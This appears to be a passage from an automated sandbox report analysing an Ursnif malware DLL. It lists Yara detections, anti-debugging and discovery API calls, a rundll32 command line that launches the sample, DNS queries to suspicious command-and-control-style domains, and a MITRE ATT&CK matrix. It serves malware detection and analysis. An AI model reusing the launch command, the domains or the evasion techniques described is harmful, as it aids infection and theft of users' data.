                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.697257309.0000000004D39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.488040276.0000000002650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.696204071.0000000003579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491247065.0000000001430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.453838951.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.476882523.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: WerFault.exe, 0000000D.00000002.542983024.0000000005680000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWp
                      Source: WerFault.exe, 0000000D.00000002.542441671.0000000005224000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.567481007.0000000004EB2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 0000000F.00000002.555925755.0000000004ED0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW(
                      Source: WerFault.exe, 00000013.00000003.565081331.0000000004EB2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E756CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E711DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E76C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E778861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BDFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BDEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BDBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E76C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E778861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E7BDFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E7BDEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E7BDBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E756CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E74B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E756CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E74B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.60.226 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.135.82 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.153.146 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.695464015.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.511070364.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.697073866.00000000035B0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.519152173.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.531338001.0000000002C10000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.695464015.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.511070364.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.697073866.00000000035B0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.519152173.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.531338001.0000000002C10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.695464015.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.511070364.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.697073866.00000000035B0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.519152173.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.531338001.0000000002C10000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.695464015.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.511070364.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.697073866.00000000035B0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.519152173.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.531338001.0000000002C10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0303A82B cpuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E711172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E76FF15 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E711825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0303A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527327468.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576012668.000000000542B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531480606.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527187841.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.659429998.00000000037AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531370717.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527048423.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531284421.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531412078.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531686708.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531172047.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.570679066.00000000039AB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.624467221.000000000532D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667937639.000000000522F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526903678.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531440376.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527256439.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526968624.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527017763.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6316, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.697257309.0000000004D39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.488040276.0000000002650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.696204071.0000000003579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491247065.0000000001430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.453838951.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.476882523.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527327468.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576012668.000000000542B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531480606.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527187841.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.659429998.00000000037AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531370717.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527048423.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531284421.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531412078.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531686708.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531172047.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.570679066.00000000039AB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.624467221.000000000532D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667937639.000000000522F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526903678.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531440376.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527256439.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526968624.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527017763.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6316, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.697257309.0000000004D39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.488040276.0000000002650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.696204071.0000000003579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491247065.0000000001430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.453838951.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.476882523.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection112Virtualization/Sandbox Evasion1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
